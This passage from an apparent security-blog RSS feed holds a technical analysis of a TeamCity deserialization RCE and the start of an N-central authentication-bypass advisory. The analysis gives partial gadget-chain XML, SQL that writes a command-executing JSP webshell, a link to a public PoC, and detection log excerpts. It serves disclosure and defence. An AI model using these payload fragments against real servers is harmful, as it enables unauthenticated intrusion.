data-type='inlineCode'>BeanModel.object</span></span><span style='font-size: undefined;'> field with a reference to the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BasicDataSource</span></span><span style='font-size: undefined;'> in entry one instead of a Boolean value. Finally, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HashAdapter.model</span></span><span style='font-size: undefined;'> refers to that </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BooleanModel</span></span><span style='font-size: undefined;'>:</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="xml">&lt;freemarker.ext.beans.HashAdapter&gt;
  &lt;wrapper&gt;
    &lt;!-- Class-introspection state from the PoC is omitted here. --&gt;
    &lt;falseModel&gt;
      &lt;object reference="../../../../../entry/jetbrains.buildServer.serverSide.metadata.impl.metadata.HSQLMetadataStorage_-SchemaMismatchException/outer-class/myHSQLStorage/myDataSource"/&gt;
      &lt;wrapper reference="../.."/&gt;
      &lt;value&gt;false&lt;/value&gt;
    &lt;/falseModel&gt;
    &lt;!-- Remaining BeansWrapper state from the PoC is omitted here. --&gt;
  &lt;/wrapper&gt;
  &lt;model reference="../wrapper/falseModel"/&gt;
&lt;/freemarker.ext.beans.HashAdapter&gt;</pre><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>The reference attributes preserve object identity rather than create copies. </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BooleanModel.object</span></span><span style='font-size: undefined;'> points to the existing datasource, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HashAdapter.model</span></span><span style='font-size: undefined;'> points to the existing </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BooleanModel</span></span><span style='font-size: undefined;'>, and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BooleanModel.wrapper</span></span><span style='font-size: undefined;'> points back to the same </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BeansWrapper</span></span><span style='font-size: undefined;'>. No reference introduces a new concrete class node. In particular, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>&lt;object&gt;</span></span><span style='font-size: undefined;'> does not repeat the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BasicDataSource</span></span><span style='font-size: undefined;'> type, so XStream does not perform a new explicit lookup for that denied class. The shared </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BeansWrapper</span></span><span style='font-size: undefined;'> supplies the class introspection used later to resolve the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>connection</span></span><span style='font-size: undefined;'> property.</span></p><h5 style="direction: ltr;"><span style='color:rgb(102, 102, 102);'>Entry three: trigger the property lookup</span></h5><p style="direction: ltr;"><span style='font-size: undefined;'>The graph can now resolve datasource properties, but it still needs an automatic callback to request one. The third entry uses a </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HashSet</span></span><span style='font-size: undefined;'>, accepted under XStream's default </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Collection</span></span><span style='font-size: undefined;'> hierarchy permission, and a Commons Collections </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>TiedMapEntry</span></span><span style='font-size: undefined;'>, accepted under the default </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Map.Entry</span></span><span style='font-size: undefined;'> hierarchy permission. A </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>TiedMapEntry</span></span><span style='font-size: undefined;'> ties a key to a backing map. Here, its </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>map</span></span><span style='font-size: undefined;'> field refers to the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HashAdapte</span></span><span style='color:rgb(24, 128, 56);font-size: undefined;'>r</span><span style='font-size: undefined;'> from entry two, and its key is the string </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>connection</span></span><span style='font-size: undefined;'>:</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="xml">&lt;set&gt;
  &lt;org.apache.commons.collections.keyvalue.TiedMapEntry&gt;
    &lt;map class="freemarker.ext.beans.HashAdapter"
         reference="../../../../entry[2]/freemarker.ext.beans.HashAdapter"/&gt;
&lt;key class="string"&gt;connection&lt;/key&gt;
  &lt;/org.apache.commons.collections.keyvalue.TiedMapEntry&gt;
&lt;/set&gt;</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>reference</span></span><span style='font-size: undefined;'> value is relative to the nested </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>&lt;map&gt;</span></span><span style='font-size: undefined;'> element. Four </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>../</span></span><span style='font-size: undefined;'> steps return to the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>LinkedHashMap</span></span><span style='font-size: undefined;'> root, and XPath's one-based </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>entry[2]</span></span><span style='font-size: undefined;'> index selects the second entry. Reusing that adapter preserves its connection to the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BooleanModel</span></span><span style='font-size: undefined;'> and, through the model, to the datasource from entry one.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Object construction now ends with one continuous route: </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>TiedMapEntry</span></span><span style='font-size: undefined;'> to </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HashAdapter</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HashAdapter</span></span><span style='font-size: undefined;'> to </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BooleanModel</span></span><span style='font-size: undefined;'>, and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BooleanModel</span></span><span style='font-size: undefined;'> to </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BasicDataSource</span></span><span style='font-size: undefined;'>. At this point, no database connection has opened yet. The gadget chain triggers when XStream inserts the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>TiedMapEntry</span></span><span style='font-size: undefined;'> into the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HashSet</span></span><span style='font-size: undefined;'>.</span></p><h4 style="direction: ltr;"><span style='color:rgb(102, 102, 102);'>Triggering gadget execution</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>A </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HashSet</span></span><span style='font-size: undefined;'> stores elements by hash. When XStream inserts the reconstructed </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>TiedMapEntry</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HashSet.add()</span></span><span style='font-size: undefined;'> automatically calls </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>TiedMapEntry.hashCode()</span></span><span style='font-size: undefined;'>. That method calls </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>getValue()</span></span><span style='font-size: undefined;'>, which performs </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>map.get(key)</span></span><span style='font-size: undefined;'> against the referenced </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HashAdapter</span></span><span style='font-size: undefined;'> with </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>connection</span></span><span style='font-size: undefined;'> as the key. It is worth noting that this is a mechanism very similar to that used by the classic </span><a href="https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections6.java"><span style='font-size: undefined;'>CommonsCollections6</span></a><span style='font-size: undefined;'> ysoserial gadget. However, the existing CommonsCollections6 gadget cannot be used because TeamCity’s XStream permissions reject the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>ChainedTransformer</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>InvokerTransformer</span></span><span style='font-size: undefined;'> classes used by CommonsCollections6.</span></p><p></p><p><span style='font-size: undefined;'>The resulting call to </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HashAdapter.get("connection")</span></span><span style='font-size: undefined;'> passes the property name </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>connection</span><span style='font-size: undefined;'> to the referenced </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BooleanModel</span></span><span style='font-size: undefined;'>. </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BooleanModel</span></span><span style='font-size: undefined;'> inherits FreeMarker's </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BeanModel</span></span><span style='font-size: undefined;'> property lookup. JavaBeans use a naming convention in which a property named </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>connection</span></span><span style='font-size: undefined;'> can be read through a public </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>getConnection()</span></span><span style='font-size: undefined;'> method, so FreeMarker invokes </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BasicDataSource.getConnection()</span></span><span style='font-size: undefined;'>.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>A Java </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>DataSource</span></span><span style='font-size: undefined;'> is a factory for Java Database Connectivity (JDBC) connections. </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BasicDataSource</span></span><span style='font-size: undefined;'> is the Apache Commons Database Connection Pooling (DBCP) implementation bundled with TeamCity. The payload configures it to load TeamCity's bundled HyperSQL Database (HSQLDB) driver and connect to a new in-memory database at a randomized </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>jdbc:hsqldb:mem:</span></span><span style='font-size: undefined;'> URL. This database is separate from TeamCity's application database and requires no TeamCity database credentials. DBCP then runs the attacker-controlled </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>connectionInitSqls</span></span><span style='font-size: undefined;'>, a list of SQL statements intended to initialize each new connection.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The initialization SQL creates a table containing a JSP scriptlet and asks HSQLDB to serialize the database to an attacker-selected path:</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="sql">CREATE TABLE IF NOT EXISTS T&lt;RANDOM&gt;(C&lt;RANDOM&gt; VARCHAR(4000))
INSERT INTO T&lt;RANDOM&gt; VALUES ('&lt;% ... Runtime.getRuntime().exec(command) ... %&gt;')
SCRIPT '../webapps/ROOT/&lt;random-hex&gt;.jspws'</pre><p></p><p><span style='font-size: undefined;'>HSQLDB's </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SCRIPT</span></span><span style='font-size: undefined;'> statement writes a textual representation of the in-memory database to the supplied path. The payload places a JavaServer Pages (JSP) scriptlet inside a table row, so the resulting SQL script is also a valid JSP template (i.e. a polyglot). This mechanism is similar to the one used by </span><a href="https://secfault-security.com/blog/libreoffice.html"><span style='font-size: undefined;'>Secfault Security</span></a><span style='font-size: undefined;'> as part of a LibreOffice exploit.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Executing a JSP payload</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Apache Jasper is the JSP engine in TeamCity's servlet container. It compiles JSP source code into Java servlet code that handles an HTTP request, then runs that code inside the TeamCity server's Java process. Whether a path reaches Jasper depends on the servlet mappings in </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>WEB-INF/web.xml</span></span><span style='font-size: undefined;'>. TeamCity defines </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>realJspServlet</span></span><span style='font-size: undefined;'> as Jasper's </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>org.apache.jasper.servlet.JspServlet</span></span><span style='font-size: undefined;'>, then maps the custom </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>*.jspws</span></span><span style='font-size: undefined;'> extension directly to it. By contrast, TeamCity sends ordinary </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>*.jsp</span></span><span style='font-size: undefined;'> requests to its </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>buildServer</span></span><span style='font-size: undefined;'> dispatcher:</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="xml">&lt;servlet&gt;
  &lt;servlet-name&gt;realJspServlet&lt;/servlet-name&gt;
  &lt;servlet-class&gt;org.apache.jasper.servlet.JspServlet&lt;/servlet-class&gt;
&lt;/servlet&gt;

&lt;servlet-mapping&gt;
  &lt;servlet-name&gt;realJspServlet&lt;/servlet-name&gt;
  &lt;url-pattern&gt;*.jspws&lt;/url-pattern&gt;
&lt;/servlet-mapping&gt;

&lt;servlet-mapping&gt;
  &lt;servlet-name&gt;buildServer&lt;/servlet-name&gt;
  &lt;url-pattern&gt;*.jsp&lt;/url-pattern&gt;
&lt;/servlet-mapping&gt;</pre><p></p><p><span style='font-size: undefined;'>The </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>buildServer</span></span><span style='font-size: undefined;'> servlet does not dispatch every direct </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>.jsp</span></span><span style='font-size: undefined;'> request to Jasper. The corresponding </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>JspController.doHandle()</span></span><span style='font-size: undefined;'> method first requires an internal TeamCity request, an authenticated TeamCity user, or an explicit configuration property that permits direct JSP requests. If these are not present, it returns HTTP 403 before the JSP runs:</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="java">// web-core.jar!jetbrains.spring.web.JspController

public class JspController extends BaseController implements CustomUrlHandler {
    protected ModelAndView doHandle(@NotNull HttpServletRequest httpServletRequest, @NotNull HttpServletResponse httpServletResponse) throws IOException, ServletException {
// ...
if (!RequestStackCalculationInterceptor.isInnerRequest(request)
        && SessionUser.getUser(request) == null
        && !TeamCityProperties.getBoolean(
            "teamcity.jsp.directRequests.allowed"
        )) {
    response.setStatus(403);
    response.getWriter().write("Access denied");
    return null;
}</pre><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>We therefore target </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>.jspws</span></span><span style='font-size: undefined;'>, as this allows a direct anonymous request to reach Jasper, compile the newly written file and execute it. This allows us to execute arbitrary Java such as </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Runtime.getRuntime().exec()</span></span><span style='font-size: undefined;'> which in turn can deliver the payload.</span></p><h2 style="direction: ltr;">Exploitation</h2><p style="direction: ltr;"><span style='font-size: undefined;'>A proof-of-concept script for CVE-2026-63077 can be found </span><a href="https://github.com/sfewer-r7/CVE-2026-63077"><span style='font-size: undefined;'>here</span></a><span style='font-size: undefined;'>. Organizations can use this script to validate their detection and remediation posture. The exploit script will leverage the gadget chain described in this analysis to write a malicious JSPWS file in order to execute an arbitrary command, before deleting the JSPWS file from disk. An example of its operation is shown below in Figure 2.</span></p><p></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt07463067f24e4b1c/6a75f477afd7db392d5294cc/poc2.png" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="poc2.png" asset-alt="poc2.png" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt07463067f24e4b1c/6a75f477afd7db392d5294cc/poc2.png" data-sys-asset-uid="blt07463067f24e4b1c" data-sys-asset-filename="poc2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="poc2.png" sys-style-type="display"/></figure><p style="text-align: center;"><span style='font-size: undefined;'><em>Figure 2: Proof-of-concept exploitation.</em></span></p><p></p><p><span style='font-size: undefined;'>The vendor-supplied patch, version </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>2026.1.3</span></span><span style='font-size: undefined;'>, has been verified to successfully prevent the unsafe deserialization of the gadget chain presented in this analysis. The </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>teamcity-server.log</span></span><span style='font-size: undefined;'> file on a patched system shows the new XStream </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>NoTypePermission.NONE</span></span><span style='font-size: undefined;'> added by the patch to effectively prevent the gadget chain's first entry, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HSQLMetadataStorage$SchemaMismatchException</span></span><span style='font-size: undefined;'>, from having its type successfully resolved.</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="html">[2026-08-07 01:53:09,794]  ERROR -   jetbrains.buildServer.SERVER - Error com.thoughtworks.xstream.security.ForbiddenClassException: jetbrains.buildServer.serverSide.metadata.impl.metadata.HSQLMetadataStorage$SchemaMismatchException; while processing request: POST '/app/agents/v1/commands/error', from client 192.168.86.70:58356, user-agent "Python-urllib/3.10", no auth

com.thoughtworks.xstream.security.ForbiddenClassException: jetbrains.buildServer.serverSide.metadata.impl.metadata.HSQLMetadataStorage$SchemaMismatchException
	at com.thoughtworks.xstream.security.NoTypePermission.allows(NoTypePermission.java:26)
	at com.thoughtworks.xstream.mapper.SecurityMapper.realClass(SecurityMapper.java:74)
	at com.thoughtworks.xstream.mapper.MapperWrapper.realClass(MapperWrapper.java:125)
	at com.thoughtworks.xstream.mapper.CachingMapper.realClass(CachingMapper.java:47)
	...</pre><h2 style="direction: ltr;">IOC</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On an exploited system, the TeamCity server logs will contain detailed exception traces due to the deserialization gadget causing a Java exception to be thrown. For example, in the log file </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>C:\TeamCity\logs\teamcity-server.log</span></span><span style='font-size: undefined;'> the following may be present. This identifies the vulnerable URI path, the attacker's IP address, and an exception that correlates to the gadget chain being used for exploitation. Note: the full stack trace has been removed for brevity:</span></p><p></p><pre language="html">[2026-08-07 00:36:36,467]  ERROR -   jetbrains.buildServer.SERVER - Error com.thoughtworks.xstream.converters.ConversionException: 
---- Debugging information ----
cause-exception     : freemarker.template.utility.UndeclaredThrowableException
cause-message       : freemarker.core._TemplateModelException: An error has occurred when reading existing sub-variable "connection"; see cause exception! The type of the containing value was: boolean+extended_hash (org.apache.commons.dbcp2.BasicDataSource wrapped into f.e.b.BooleanModel)
class               : java.util.HashSet
required-type       : java.util.HashSet
converter-type      : com.thoughtworks.xstream.converters.collections.CollectionConverter
path                : /linked-hash-map/entry[3]/set/org.apache.commons.collections.keyvalue.TiedMapEntry
line number         : 104
class[1]            : java.util.LinkedHashMap
required-type[1]    : java.util.LinkedHashMap
converter-type[1]   : com.thoughtworks.xstream.converters.collections.MapConverter
version             : 2026.1-222647
-------------------------------; while processing request: POST '/app/agents/v1/commands/error', from client 192.168.86.70:52728, user-agent "Python-urllib/3.10", no auth

com.thoughtworks.xstream.converters.ConversionException: 
---- Debugging information ----
cause-exception     : freemarker.template.utility.UndeclaredThrowableException
cause-message       : freemarker.core._TemplateModelException: An error has occurred when reading existing sub-variable "connection"; see cause exception! The type of the containing value was: boolean+extended_hash (org.apache.commons.dbcp2.BasicDataSource wrapped into f.e.b.BooleanModel)
class               : java.util.HashSet
required-type       : java.util.HashSet
converter-type      : com.thoughtworks.xstream.converters.collections.CollectionConverter
path                : /linked-hash-map/entry[3]/set/org.apache.commons.collections.keyvalue.TiedMapEntry
line number         : 104
class[1]            : java.util.LinkedHashMap
required-type[1]    : java.util.LinkedHashMap
converter-type[1]   : com.thoughtworks.xstream.converters.collections.MapConverter
version             : 2026.1-222647
-------------------------------
	at com.thoughtworks.xstream.core.TreeUnmarshaller.convert(TreeUnmarshaller.java:81)
	at com.thoughtworks.xstream.core.AbstractReferenceUnmarshaller.convert(AbstractReferenceUnmarshaller.java:72)
	...</pre><p></p><p><span style='font-size: undefined;'>A similar exception in a </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>javaLogging</span></span><span style='font-size: undefined;'> file (for example, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>C:\TeamCity\logs\teamcity-javaLogging-2026-08-07.log</span></span><span style='font-size: undefined;'>) will also show the gadget chain’s JSPWS payload as part of an </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>org.hsqldb.HsqlException</span></span><span style='font-size: undefined;'> message:</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="html">07-Aug-2026 00:36:36.462 SEVERE [http-nio-8111-exec-4] org.apache.catalina.core.StandardWrapperValve.invoke Servlet.service() for servlet [buildServer] in context with path [] threw exception [Request processing failed; nested exception is com.thoughtworks.xstream.converters.ConversionException: 
---- Debugging information ----
cause-exception     : freemarker.template.utility.UndeclaredThrowableException
cause-message       : freemarker.core._TemplateModelException: An error has occurred when reading existing sub-variable "connection"; see cause exception! The type of the containing value was: boolean+extended_hash (org.apache.commons.dbcp2.BasicDataSource wrapped into f.e.b.BooleanModel)
class               : java.util.HashSet
required-type       : java.util.HashSet
converter-type      : com.thoughtworks.xstream.converters.collections.CollectionConverter
path                : /linked-hash-map/entry[3]/set/org.apache.commons.collections.keyvalue.TiedMapEntry
line number         : 104
class[1]            : java.util.LinkedHashMap
required-type[1]    : java.util.LinkedHashMap
converter-type[1]   : com.thoughtworks.xstream.converters.collections.MapConverter
version             : 2026.1-222647
-------------------------------] with root cause
	org.hsqldb.HsqlException: file input/output error: ../webapps/ROOT/682aed03b49b.jspws already exists
		at org.hsqldb.error.Error.error(Unknown Source)
	...</pre><h2 style="direction: ltr;">Remediation</h2><p style="direction: ltr;"><span style='font-size: undefined;'>For remediation guidance, please see Rapid7’s Emergent Threat Response </span><a href="https://www.rapid7.com/blog/post/etr-cve-2026-63077-critical-unauthenticated-remote-code-execution-in-jetbrains-teamcity/"><span style='font-size: undefined;'>blog</span></a><span style='font-size: undefined;'> for CVE-2026-63077, which contains further details.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/ra-unauthenticated-rce-in-jetbrains-teamcity-cve-2026-63077</link>
      <guid isPermaLink="false">blt720afa3aee7d865e</guid>
      <category><![CDATA[Rapid7 Analysis]]></category>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Labs]]></category><dc:creator><![CDATA[Stephen Fewer]]></dc:creator>
      <pubDate>Fri, 07 Aug 2026 14:32:47 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcbf09ec3af35e28e/6a15c63f08221ed5144dbf77/webinar-rapid7-logo.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2026-18577: N-able N-central Authentication Bypass Exploited in the Wild]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On August 2, 2026, N-able </span><a href="https://status.n-able.com/2026/08/02/n-central-2026-3-hotfix-1-mitigation-for-cve-2026-18577/"><span style='font-size: undefined;'>published</span></a><span style='font-size: undefined;'> a security advisory for </span><a href="https://www.rapid7.com/db/vulnerabilities/cve-2026-18577/"><span style='font-size: undefined;'>CVE-2026-18577</span></a><span style='font-size: undefined;'>, an authentication bypass vulnerability affecting N-central that was discovered being exploited in-the-wild after an incomplete fix for an earlier authentication bypass issue, </span><a href="https://www.rapid7.com/db/vulnerabilities/cve-2026-18556/"><span style='font-size: undefined;'>CVE-2026-18556</span></a><span style='font-size: undefined;'> was disclosed. CVE-2026-18577 allows a remote unauthenticated attacker to bypass authentication and obtain administrative control of vulnerable N-central servers in affected deployments.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>N-able </span><a href="https://www.n-able.com/products/n-central-rmm/network-and-device-management"><span style='font-size: undefined;'>N-central</span></a><span style='font-size: undefined;'> is a widely deployed Remote Monitoring and Management (RMM) platform used by managed service providers (MSPs) and enterprise IT teams to centrally administer servers, workstations, network devices, and other managed assets. Because the platform operates with extensive administrative privileges across customer environments, successful compromise of an N-central server can provide attackers with an efficient path to compromise downstream managed systems.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>According to N-able, exploitation of CVE-2026-18577 has been </span><a href="https://www.n-able.com/blog/n-central-security-update-august-2-2026"><span style='font-size: undefined;'>observed</span></a><span style='font-size: undefined;'> in the wild since </span><a href="https://uptime.n-able.com/event/201454/"><span style='font-size: undefined;'>August 1, 2026</span></a><span style='font-size: undefined;'>. Following successful exploitation, attackers leveraged the platform's Take Control functionality to remotely access managed endpoints, and deployed Cloudflare Tunnel (</span><span style='font-size: undefined;'><span data-type='inlineCode'>cloudflared</span></span><span style='font-size: undefined;'>) to establish persistent remote access. On August 3, 2026, CVE-2026-18577 was </span><a href="https://www.cisa.gov/news-events/alerts/2026/08/03/cisa-adds-one-known-exploited-vulnerability-catalog"><span style='font-size: undefined;'>added</span></a><span style='font-size: undefined;'> to CISA’s Known Exploited Vulnerability (KEV) catalog and on August 5, 2026, CVE-2026-18556 was also added to the catalog.</span></p><p><span style='font-size: undefined;'>On August 6, 2026, N-able released a </span><a href="https://status.n-able.com/2026/08/06/n-central-2026-3-hotfix-2-additional-mitigation-for-cve-2026-18577/" target="_self"><span style='font-size: undefined;'>second hotfix</span></a><span style='font-size: undefined;'> to further address CVE-2026-18577. This second hotfix supersedes the original hotfix published on August 2, 2026, and provides additional mitigations against the same vulnerability. Customers who have not yet applied the new 2026.3 Hotfix 2 should do so on an urgent basis.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations operating vulnerable N-central deployments should prioritize remediation on an urgent basis, outside of normal patching schedules. Hosted N-central environments are upgraded automatically by the vendor, while on-premise deployments require manual remediation.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Affected versions:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>All versions of N-able N-central up to and including version 2026.3.1, prior to Hotfix 2.</span></p></li></ul><p><span style='font-size: undefined;'>Fixed version:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>N-able N-central 2026.3.1 Hotfix 2 (</span><span style='font-size: undefined;'><span data-type='inlineCode'>2026.3.1.10</span></span><span style='font-size: undefined;'>).</span></p></li></ul><p><span style='font-size: undefined;'>The vendor also recommends:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Upgrading N-central agents after applying the server hotfix.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Reviewing systems for indicators of compromise.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Contacting N-able Support immediately if evidence of compromise is discovered.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Engaging internal incident response teams if malicious activity is identified.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>For further information, see the vendor </span><a href="https://status.n-able.com/2026/08/06/n-central-2026-3-hotfix-2-additional-mitigation-for-cve-2026-18577/" target="_self"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">IOCs</h2><p style="direction: ltr;"><span style='font-size: undefined;'>N-able has </span><a href="https://status.n-able.com/2026/08/02/n-central-2026-3-hotfix-1-mitigation-for-cve-2026-18577/"><span style='font-size: undefined;'>published</span></a><span style='font-size: undefined;'> several artifacts that administrators should investigate during incident response.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Endpoint Artifacts:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Presence of a </span><span style='font-size: undefined;'><span data-type='inlineCode'>cloudflared</span></span><span style='font-size: undefined;'> service.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>A suspicious </span><span style='font-size: undefined;'><span data-type='inlineCode'>svchost.exe</span></span><span style='font-size: undefined;'> located within the user's Documents folder.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Network Indicators:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Administrators should review historical network logs for inbound or outbound communication involving the malicious IP addresses identified by the vendor:</span></p></li><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><span 